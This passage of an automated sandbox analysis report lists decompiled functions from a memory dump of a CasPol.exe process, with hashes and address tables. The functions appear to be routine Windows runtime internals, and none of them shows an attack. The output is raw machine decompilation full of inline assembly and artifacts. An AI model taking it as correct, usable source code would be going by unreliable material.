                                                                0x0165e7dc
                                                                0x0165e7de
                                                                0x0165e7de
                                                                0x0165e7ac
                                                                0x0165e7e4
                                                                0x0165e74b
                                                                0x0165e751
                                                                0x0165e759
                                                                0x0165e761
                                                                0x0165e761

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 631b16e21a36a08cde14037094bc39c3238ed76b8e7abd81202856a8cdfeb8d3
                                                                • Instruction ID: b1b157de4db86bbd8a3403128a97a480d495e8a676ddb4af48ac37816d83e319
                                                                • Opcode Fuzzy Hash: 631b16e21a36a08cde14037094bc39c3238ed76b8e7abd81202856a8cdfeb8d3
                                                                • Instruction Fuzzy Hash: 4C315C75A14249AFDB44CF68D841B9AFBE8FB09314F14825AF904CB341D632ED90CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0165BC2C Relevance: .1, Instructions: 88COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 67%
                                                                			E0165BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1716100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E01642280(0xd, 0x736f1a0);
				_t41 =  *0x17160f8; // 0x0
				if(_t41 != 0) {
					 *0x17160f8 =  *_t41;
					 *0x17160fc =  *0x17160fc + 0xffff;
				}
				E0163FFB0(_t41, 0x800, 0x736f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x17160f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L01644620(0x1716100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1716100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}










                                                                0x0165bc36
                                                                0x0165bc42
                                                                0x0165bc45
                                                                0x0165bc4a
                                                                0x0165bd35
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165bc50
                                                                0x0165bc50
                                                                0x0165bc58
                                                                0x0165bc5a
                                                                0x0165bc60
                                                                0x00000000
                                                                0x00000000
                                                                0x0169a4f2
                                                                0x0169a4f6
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0169a4fc
                                                                0x0165bc79
                                                                0x0165bc7e
                                                                0x0165bc86
                                                                0x0165bd16
                                                                0x0165bd20
                                                                0x0165bd20
                                                                0x0165bc8d
                                                                0x0165bc94
                                                                0x0165bcbd
                                                                0x0165bcca
                                                                0x0165bccb
                                                                0x0165bccc
                                                                0x0165bccd
                                                                0x0165bcce
                                                                0x0165bcd4
                                                                0x0165bcea
                                                                0x0165bcee
                                                                0x0165bcf2
                                                                0x0165bd00
                                                                0x0165bd04
                                                                0x00000000
                                                                0x0165bc96
                                                                0x0165bcab
                                                                0x0165bcaf
                                                                0x0165bd2c
                                                                0x0165bd2c
                                                                0x0165bd09
                                                                0x00000000
                                                                0x0165bd09
                                                                0x0165bcb1
                                                                0x0165bcb5
                                                                0x0165bcbb
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x0165bcbb

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 836d17d48a543ab7f34531bee5c36d0e48c61a212ee88bb03c34729ef454771e
                                                                • Instruction ID: c32a5084a47ead977a95f461a9757be98a6359d9799977a8917947c104033c62
                                                                • Opcode Fuzzy Hash: 836d17d48a543ab7f34531bee5c36d0e48c61a212ee88bb03c34729ef454771e
                                                                • Instruction Fuzzy Hash: 30310132A006169BCB51EF5CC8C0BA673B5FB18321F1541B8ED44DB305EBB4DA05CB84
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01629100 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 76%
                                                                			E01629100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x16ff6e8);
				E0167D0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E016F88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E0167D130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x17186c0; // 0x11c07b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x17186b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E01642280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E016F88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0166AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x171b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x17184c0;
										if(_t69 >=  *0x17184c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E016F9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0162922A(_t82);
							_t53 = E01647D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E016F8B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x17186c0; // 0x11c07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x17186b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x17186bc;
										_t72 = 0x17186b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01629240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x17186c4;
									_t72 = 0x17186c0;
									L18:
									E01659B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}


















                                                                0x01629100
                                                                0x01629100
                                                                0x01629100
                                                                0x01629100
                                                                0x01629102
                                                                0x01629107
                                                                0x0162910c
                                                                0x01629110
                                                                0x01629115
                                                                0x01629136
                                                                0x01629143
                                                                0x016837e4
                                                                0x016837e4
                                                                0x01629149
                                                                0x0162914e
                                                                0x0162914e
                                                                0x01629117
                                                                0x0162911d
                                                                0x00000000
                                                                0x00000000
                                                                0x0162911f
                                                                0x01629125
                                                                0x00000000
                                                                0x01629151
                                                                0x01629158
                                                                0x0162915d
                                                                0x01629161
                                                                0x01629168
                                                                0x01683715
                                                                0x00000000
                                                                0x0162916e
                                                                0x0162916e
                                                                0x01629175
                                                                0x01629177
                                                                0x0162917e
                                                                0x0162917f
                                                                0x01629182
                                                                0x01629182
                                                                0x01629187
                                                                0x01629187
                                                                0x0162918a
                                                                0x0162918d
                                                                0x0162918f
                                                                0x01629192
                                                                0x01629195
                                                                0x01629198
                                                                0x01629198
                                                                0x01629198
                                                                0x0162919a
                                                                0x00000000
                                                                0x00000000
                                                                0x0168371f
                                                                0x01683721
                                                                0x01683727
                                                                0x0168372f
                                                                0x01683733
                                                                0x01683735
                                                                0x01683738
                                                                0x0168373b
                                                                0x0168373d
                                                                0x01683740
                                                                0x00000000
                                                                0x00000000
                                                                0x01683746
                                                                0x01683749
                                                                0x00000000
                                                                0x00000000
                                                                0x0168374f
                                                                0x01683751
                                                                0x00000000
                                                                0x00000000
                                                                0x01683757
                                                                0x01683759
                                                                0x0168375c
                                                                0x0168375c
                                                                0x0168375e
                                                                0x0168375e
                                                                0x01683761
                                                                0x01683764
                                                                0x00000000
                                                                0x00000000
                                                                0x01683766
                                                                0x01683768
                                                                0x016837a3
                                                                0x016837a3
                                                                0x016837a5
                                                                0x016837a7
                                                                0x016837ad
                                                                0x016837b0
                                                                0x016837b2
                                                                0x016837bc
                                                                0x016837c2
                                                                0x016837c2
                                                                0x016837b2
                                                                0x01629187
                                                                0x01629187
                                                                0x0162918a
                                                                0x0162918d
                                                                0x0162918f
                                                                0x01629192
                                                                0x01629195
                                                                0x00000000
                                                                0x01629195
                                                                0x00000000
                                                                0x01629187
                                                                0x0168376a
                                                                0x0168376a
                                                                0x0168376c
                                                                0x0168376c
                                                                0x0168376f
                                                                0x01683775
                                                                0x00000000
                                                                0x00000000
                                                                0x01683777
                                                                0x01683779
                                                                0x00000000
                                                                0x00000000
                                                                0x01683782
                                                                0x01683787
                                                                0x01683789
                                                                0x01683790
                                                                0x01683790
                                                                0x0168378b
                                                                0x0168378b
                                                                0x0168378b
                                                                0x01683792
                                                                0x01683795
                                                                0x01683795
                                                                0x01683798
                                                                0x01683798
                                                                0x0168379b
                                                                0x0168379b
                                                                0x016291a3
                                                                0x016291a9
                                                                0x016291b0
                                                                0x016291b4
                                                                0x016291b4
                                                                0x016291bb
                                                                0x016291c0
                                                                0x016291c5
                                                                0x016291c7
                                                                0x016837da
                                                                0x016291cd
                                                                0x016291cd
                                                                0x016291cd
                                                                0x016291d2
                                                                0x016291d5
                                                                0x01629239
                                                                0x01629239
                                                                0x016291d7
                                                                0x016291db
                                                                0x016291e1
                                                                0x016291e7
                                                                0x016291fd
                                                                0x01629203
                                                                0x0162921e
                                                                0x01629223
                                                                0x00000000
                                                                0x01629223
                                                                0x01629205
                                                                0x01629208
                                                                0x0162920c
                                                                0x01629214
                                                                0x01629214
                                                                0x016291e9
                                                                0x016291e9
                                                                0x016291ee
                                                                0x016291f3
                                                                0x016291f3
                                                                0x016291f3
                                                                0x016291e7
                                                                0x00000000
                                                                0x016291db
                                                                0x01629187
                                                                0x01629168

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4a6b840303580e7cea04e022525b8b161c9f70b84fdfd181eccc09712ddfbd0a
                                                                • Instruction ID: 8f73c0631d230537f470714edab438d75061be14d2bb7a03dd9a1971a58b7708
                                                                • Opcode Fuzzy Hash: 4a6b840303580e7cea04e022525b8b161c9f70b84fdfd181eccc09712ddfbd0a
                                                                • Instruction Fuzzy Hash: 4C31B271A01A65DFEB26DB6DCC8C7ACBBB1BB99318F24855DC50467342C330A980CF56
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01651DB5 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 60%
                                                                			E01651DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0164F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01644620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0164F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}












                                                                0x01651dc2
                                                                0x01651dc5
                                                                0x01651dc7
                                                                0x01651dcc
                                                                0x01651dce
                                                                0x01651dd6
                                                                0x01651ddf
                                                                0x01651de0
                                                                0x01651de1
                                                                0x01651de5
                                                                0x01651de8
                                                                0x01651def
                                                                0x01651df0
                                                                0x01651df6
                                                                0x01651df7
                                                                0x01651dfe
                                                                0x01651e1a
                                                                0x00000000
                                                                0x00000000
                                                                0x01651e0b
                                                                0x01651e12
                                                                0x01651e12
                                                                0x01651e00
                                                                0x01651e00
                                                                0x01651e05
                                                                0x01651e1e
                                                                0x01651e23
                                                                0x0169570f
                                                                0x01695713
                                                                0x00000000
                                                                0x00000000
                                                                0x01695719
                                                                0x01695719
                                                                0x01651e2c
                                                                0x01651e2d
                                                                0x01651e2e
                                                                0x01651e2f
                                                                0x01651e31
                                                                0x01651e32
                                                                0x01651e35
                                                                0x01651e3d
                                                                0x01695723
                                                                0x0169573d
                                                                0x0169573d
                                                                0x00000000
                                                                0x01695723
                                                                0x01651e49
                                                                0x01651e4e
                                                                0x01651e4e
                                                                0x01651e09
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                • Instruction ID: 243b216fa6abf2496facff3875871ba2b0e6297ee66fb7d1e163c5e3811472f9
                                                                • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                                                • Instruction Fuzzy Hash: 98218E72601119EFD721DF99CC81FABBBBDEF86640F114099EA059B210DB34AE01DBA0
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01640050 Relevance: .1, Instructions: 81COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 53%
                                                                			E01640050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x171d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E01659ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0166B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E016F8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E01659702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x171b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}




















                                                                0x01640055
                                                                0x0164005d
                                                                0x01640062
                                                                0x0164006c
                                                                0x0164006f
                                                                0x01640074
                                                                0x0164007a
                                                                0x0164007a
                                                                0x01640080
                                                                0x01640080
                                                                0x01640087
                                                                0x0164008d
                                                                0x0164008f
                                                                0x01640093
                                                                0x01640095
                                                                0x0164009b
                                                                0x016400f8
                                                                0x016400fb
                                                                0x016400fc
                                                                0x016400ff
                                                                0x01640108
                                                                0x01640108
                                                                0x016400a2
                                                                0x016400a6
                                                                0x016400b3
                                                                0x016400bc
                                                                0x016400c5
                                                                0x016400ca
                                                                0x0168c01e
                                                                0x00000000
                                                                0x00000000
                                                                0x0168c02d
                                                                0x016400d5
                                                                0x016400d9
                                                                0x0168c03d
                                                                0x0168c046
                                                                0x0168c046
                                                                0x016400df
                                                                0x016400e2
                                                                0x016400ea
                                                                0x016400ef
                                                                0x016400f2
                                                                0x016400f6
                                                                0x01640111
                                                                0x01640117
                                                                0x01640117
                                                                0x00000000
                                                                0x016400f6
                                                                0x016400d0
                                                                0x016400d0
                                                                0x00000000

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bb986143962ccee551d8fcafe6b68d64c4e5deb0c2778eda9df26131441dbd2f
                                                                • Instruction ID: 35cd680e824f588035f2bbc5d710c44cf93c38d65a7f89443669c5bacc58f894
                                                                • Opcode Fuzzy Hash: bb986143962ccee551d8fcafe6b68d64c4e5deb0c2778eda9df26131441dbd2f
                                                                • Instruction Fuzzy Hash: 51315C31601B14CFD726CB2CCC44B96B7E6FF89714F14856DEA9687B90EB75A802CB90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016A6C0A Relevance: .1, Instructions: 79COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 77%
                                                                			E016A6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01647D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1717b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01644620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0166F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01647D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01669AE0();
						_t23 = L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                                                0x016a6c0a
                                                                0x016a6c0f
                                                                0x016a6c10
                                                                0x016a6c13
                                                                0x016a6c15
                                                                0x016a6c19
                                                                0x016a6c1c
                                                                0x016a6c21
                                                                0x016a6c28
                                                                0x016a6c3a
                                                                0x016a6c2a
                                                                0x016a6c33
                                                                0x016a6c33
                                                                0x016a6c3f
                                                                0x016a6c48
                                                                0x016a6c4d
                                                                0x016a6c60
                                                                0x016a6c65
                                                                0x016a6c69
                                                                0x016a6c73
                                                                0x016a6c79
                                                                0x016a6c7f
                                                                0x016a6c86
                                                                0x016a6c90
                                                                0x016a6c94
                                                                0x016a6ca6
                                                                0x016a6cb2
                                                                0x016a6cbd
                                                                0x016a6cbd
                                                                0x016a6cc3
                                                                0x016a6cc7
                                                                0x016a6ccb
                                                                0x016a6cd0
                                                                0x016a6cd1
                                                                0x016a6ce2
                                                                0x016a6ce2
                                                                0x016a6c69
                                                                0x016a6ced

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2acf1eec9b4a6d6af9941afe6a34729d87ab4591776dcadd22f8124ca66699ab
                                                                • Instruction ID: 1068bb4426eebbc6b8138ccbeadd8e5c0951c8e53941fafe429e94b0ea3f7368
                                                                • Opcode Fuzzy Hash: 2acf1eec9b4a6d6af9941afe6a34729d87ab4591776dcadd22f8124ca66699ab
                                                                • Instruction Fuzzy Hash: 04217AB2A00655AFD715DF68DC80E6AB7A8FF48740F184069F905D7791DB34ED10CBA8
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016690AF Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 82%
                                                                			E016690AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0167D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0165E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01644620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0166F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0165A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                                                0x016690af
                                                                0x016690b8
